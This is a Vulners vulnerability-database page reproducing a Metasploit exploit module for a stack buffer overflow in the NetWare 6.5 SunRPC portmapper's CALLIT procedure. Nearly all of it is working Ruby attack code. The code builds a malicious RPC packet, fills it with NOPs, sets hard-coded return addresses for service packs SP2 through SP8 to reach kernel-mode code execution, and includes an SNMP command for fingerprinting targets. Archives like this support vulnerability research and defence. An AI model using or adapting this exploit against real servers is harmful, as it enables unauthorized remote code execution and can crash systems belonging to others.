Vulners
Lucene search
NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
##
# $Id: pkernel_callit.rb 11039 2010-11-14 19:03:24Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
cause the operating system to reboot.
},
'Author' => [ 'pahtzo', ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11039 $',
'References' =>
[
# There is no CVE for this vulnerability
[ 'BID', '36564' ],
[ 'OSVDB', '58447' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-067/' ],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2020,
},
'Platform' => 'netware',
'Targets' =>
[
# NetWare SP and PKERNEL.NLM version can be found in SNMP:
# snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
# sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008
# hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"
[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
],
'DisclosureDate' => 'Sep 30 2009'))
register_options([Opt::RPORT(111)], self.class)
end
def exploit
connect_udp
buf = [rand(0xffffffff)].pack('N') # XID
buf << [0].pack('N') # Message Type: Call (0)
buf << [2].pack('N') # RPC Version: 2
buf << [100000].pack('N') # Program: Portmap (100000)
buf << [2].pack('N') # Program Version: 2
buf << [5].pack('N') # Procedure: CALLIT (5)
buf << [0].pack('N') # Credentials AUTH_NULL (0)
buf << [0].pack('N') # Length: 0
buf << [0].pack('N') # Verifier AUTH_NULL (0)
buf << [0].pack('N') # Length: 0
buf << [0].pack('N') # Program: Unknown (0)
buf << [1].pack('N') # Version: 1
buf << [1].pack('N') # Procedure: proc-1 (1)
buf << [4097].pack('N') # Arguments: <DATA> length: 4097
buf << make_nops(2072) # fill to ret
buf << [target.ret].pack('V') # addr. of push esp - ret
buf << payload.encoded #
# print_status("payload space #{payload_space()}...")
# print_status("payload len #{payload.encoded.length}...")
# print_status("total buf len #{buf.length}...")
print_status("Trying target #{target.name}...")
udp_sock.put(buf)
handler
disconnect_udp
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1